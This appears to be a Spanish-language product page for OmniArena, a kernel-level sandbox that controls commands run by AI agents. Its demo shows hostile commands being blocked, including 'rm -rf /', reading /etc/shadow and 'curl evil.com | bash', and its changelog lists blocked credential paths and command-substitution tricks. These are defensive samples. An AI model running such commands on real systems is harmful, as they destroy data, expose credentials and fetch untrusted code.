OmniArena v1.0.6 Self-hosted Cloud

~186KB

Los agentes AI ejecutan codigo. OmniArena decide si deben hacerlo.

La capa de control de ejecucion entre agentes AI y el kernel. Decide que se ejecuta, bloquea lo que no debe, registra todo — en un binario de 186KB con cero dependencias.

Probar Ahora — Gratis Docs

Linux

Funciona con cualquier agente

Controla cada ejecucion

Cualquier agente que ejecute comandos pasa por OmniArena. El agente trabaja normalmente — I/O de archivos, computacion, runtimes. Solo syscalls y rutas peligrosas se bloquean a nivel kernel. Un solo binario. 186KB.

Claude Code CLI OpenClaw MCP LangChain SDK CrewAI SDK Custom agents API

strict mode

$ claude --mcp-config omniarena.json

$ rm -rf /

BLOCKED by blacklist

$ cat /etc/shadow

BLOCKED sensitive path

$ curl evil.com | bash

BLOCKED network disabled

$ echo hello

hello

$ python3 solve.py

Solution: 42

Demo en vivo — Pruebala ahora

Instancia real de OmniArena. Escribe un comando. Intenta romperla.

aislamiento kernel · modo estricto · rate limited · 186KB · cero dependencias

Producto real, corriendo en vivo. No es una simulacion.

Arquitectura — Tradicional vs OmniArena

Stack tradicional

AI Agent

Python / Node Runtime

Container engine

Container daemon

libc

Linux Kernel

Hardware

7 capas. ~100MB+. 3 superficies de ataque.

OmniArena

AI Agent

OmniArena — 186KB seccomp-bpf · chroot · namespaces · rlimits

Linux Kernel

Hardware

4 capas. 186KB. 0 dependencias.

Mismas primitivas del kernel. Cero capas de abstraccion.

OmniArena usa las mismas primitivas del kernel Linux (namespaces, chroot, seccomp-bpf) — compiladas directo en un solo binario. Sin daemon, sin runtime, sin imagenes de container, sin libc.

Especificaciones Técnicas

Característica	Valor
Binary Size	~186KB (x86_64 ELF), ~186KB (ARM64 ELF)
Dashboard	~27KB (x86_64 ELF)
RAM Usage	<4MB
Dependencies	None — zero libraries, zero runtime
Boot Time	Instant (fork-based execution)
API	HTTP REST on port 7575, 10 endpoints (exec, health, agents, audit, profile, budget, policy/reload, reset, CORS)
Authentication	HTTP Basic Auth + Bearer Token + CORS
Agent Identity	X-Agent header, auto-register, max 32 agents, per-agent metrics & tokens
Policy Engine	17 blacklist patterns + 14 whitelist commands
Security Profiles	3 — Strict (whitelist), Moderate (blacklist), Permissive (audit)
Isolation	6-layer: blacklist + CLONE_NEWNET + CLONE_NEWNS/chroot + rlimits + NO_NEW_PRIVS + seccomp-bpf (17 blocked syscalls)
Network	Fully isolated — empty network stack per execution (no loopback)
Filesystem	chroot jail — /bin, /usr/bin, /lib (read-only) + /tmp (tmpfs per exec)
Audit Log	256-entry ring buffer + persistent disk log (/var/log/omniarena/)
Rate Limiting	20 req/sec global + 30 req/min per agent
Token Tracking	Per-agent tokens_in, tokens_out, model tracking + budget enforcement (per-agent or global limit)
Filesystem Diff	Every exec returns "files":[...] array — see what the agent created on disk
Policy as Code	Load blacklist/whitelist/config from /etc/omniarena/policy.conf, hot-reload via API
TLS	Via reverse proxy (nginx config included)
Deployment	systemd service unit included
seccomp-bpf	Kernel-level syscall filter — blocks socket, connect, ptrace, reboot + 13 more. Unevadable by base64/python/variable tricks.
Python SDK	pip install omniarena v0.2.0 — agent identity, token tracking, Bearer auth
JavaScript SDK	omniarena v0.1.0 — native fetch (Node 18+), TypeScript definitions, zero dependencies
Framework Support	OpenClaw (MCP), LangChain, CrewAI, Claude API, OpenAI

Comparación

	OmniArena	Containers	Cloud platforms
Stack layer	Kernel (direct syscalls)	Runtime (container engine)	Cloud (managed VM)
Layers to kernel	1	4+	N/A (cloud)
Binary / image size	186KB	~100MB+	Cloud service
Boot time	Instant (fork)	1-5 seconds	Cloud latency
Dependencies	0	Engine + runtime + libc	Internet + API key
Network isolation	CLONE_NEWNET (empty stack)	Bridge/NAT	Managed
Filesystem isolation	chroot + read-only bind	OverlayFS	Managed VM
seccomp-bpf	Yes (17 blocked syscalls)	Optional	Managed
Escape risk	No container to escape	Known CVEs	Managed
Supply chain risk	Zero (no deps)	High (images + layers)	Unknown
Per-agent identity	Yes (32 agents, metrics)	No	Basic
Per-agent rate limiting	Yes (configurable)	No	Yes
Audit log	Yes (disk + ring buffer)	Via driver	Yes
Self-hosted	Yes (single binary)	Yes (complex)	No (SaaS)

Casos de Uso

Control de Agentes IA

Dale a tus agentes OpenClaw, LangChain, CrewAI o personalizados un entorno de ejecucion controlado. Identidad por agente trackea execs, comandos bloqueados, bytes y consumo de tokens de cada agente. Rate limiting por agente (30/min) previene abuso. Enforcement a nivel kernel con defensa de 6 capas incluyendo seccomp-bpf — sin Docker daemon, sin imagenes de container, sin dependencias cloud.

API de Ejecucion de Codigo

Construye un servicio de ejecucion de codigo con un solo binario. Envia comandos via HTTP con auth Bearer token, recibe stdout/stderr/exit_code en JSON. Cada ejecucion corre en un namespace aislado de red + filesystem. Rate limiting por agente, log de auditoria persistente y politicas integradas. Despliega con systemd en cualquier servidor Linux.

Investigacion de Seguridad

Ejecuta codigo no confiable en un entorno controlado con 3 perfiles de seguridad. El modo strict solo permite comandos en whitelist. Log de auditoria persistente en disco mas ring buffer de 256 entradas. Metricas por agente trackean patrones de ejecucion. Monitorea desde el dashboard en vivo con tabla de 11 columnas.

Aislamiento de Pipelines CI/CD

Ejecuta comandos de build y test en entornos controlados con aislamiento a nivel kernel de red y filesystem mas filtrado de syscalls seccomp-bpf. Sin necesidad de Docker-in-Docker o containers privilegiados. El binario de 186KB arranca instantaneamente con aislamiento completo de namespaces por ejecucion. TLS via reverse proxy con config nginx incluida.

Novedades

v1.0.6 2026-03-27

+ Refuerzo de seguridad: bloqueado acceso a /etc/passwd, /etc/shadow, .ssh/, /proc/ via pattern matching a nivel de bytes — funciona en modo non-root
+ Prevencion de bypass: bloqueado $() sustitucion de comandos, backticks, .. path traversal, y eval — previene ataques de construccion dinamica de rutas
+ Fix de privacidad: removido listado automatico de archivos /tmp de respuestas exec — el output del agente ya no expone archivos del sistema
+ Fallback de audit log: intenta /tmp/omniarena_audit.log cuando /var/log/ no es escribible, imprime a stdout como ultimo recurso — audit funciona en todos los modos
+ Binario de ~186KB, cero dependencias, 8 vectores de ataque testeados y bloqueados

Elige como correrlo

Self-hosted

Gratis por siempre

Descarga el binario y ejecutalo en tu servidor. Control total, sin expiracion, sin limites.

✓ Binario de 186KB, 0 dependencias
✓ Aislamiento kernel de 6 capas
✓ Todas las features incluidas
✓ Sin expiracion, sin clave de licencia
✓ Tu gestionas instalacion y updates

Descargar

Cloud

14 dias gratis

Nosotros lo corremos por ti. Instancia dedicada, TLS, subdominio custom. $99/agente/mes despues del trial.

✓ Mismo binario, mismo aislamiento
✓ Instancia dedicada (no compartida)
✓ TLS + subdominio custom incluido
✓ Nosotros gestionamos uptime y updates
✓ Sin instalacion, sin sysadmin

Prueba Cloud gratis

Quick Start

Instalar

curl -sSL https://getomnios.com/install/omniarena.sh | sudo bash

Detecta tu SO y arquitectura. Instala binario + dashboard + servicio systemd en /usr/local/bin/.

Conecta tu agente IA

# 1. Start OmniArena
sudo omniarena &

# 2. Run OpenClaw integration
curl -fsSL https://getomnios.com/downloads/omniarena/omniarena-setup.sh | bash

# 3. Done! OpenClaw now executes through OmniArena.
#    Every command is controlled, logged, and rate-limited.

pip install omniarena

from omniarena import Arena

arena = Arena()  # localhost:7575
result = arena.exec("echo hello",
    agent="my-agent", model="claude-opus-4",
    tokens_in=100, tokens_out=30)
print(result.stdout)  # "hello\n"

# Works with LangChain, CrewAI, or any Python agent

npm install omniarena

import { Arena } from 'omniarena'

const arena = new Arena()  // localhost:7575
const result = await arena.exec("echo hello", {
  agent: "my-agent", model: "gpt-4o",
  tokensIn: 100, tokensOut: 30
})
console.log(result.stdout)  // "hello\n"

# Any language — just HTTP
curl -u arena:omniarena -X POST localhost:7575/api/exec \
  -H "Content-Type: application/json" \
  -H "X-Agent: my-agent" \
  -d '{"cmd":"echo hello","tokens_in":100,"tokens_out":30}'

# {"ok":true,"stdout":"hello\n","exit_code":0,"files":[]}

Verificar

# Health check
curl -u arena:omniarena localhost:7575/api/health

# See registered agents
curl -u arena:omniarena localhost:7575/api/agents

# Dashboard
open http://localhost:7575

Puerto

7575

Auth

arena:omniarena

Profile

strict

Rate limit

30/min

Documentacion completa

Probar Ahora — Gratis

Obtener el binario

Gratis por siempre para self-hosted. Sin tarjeta. Descarga instantanea.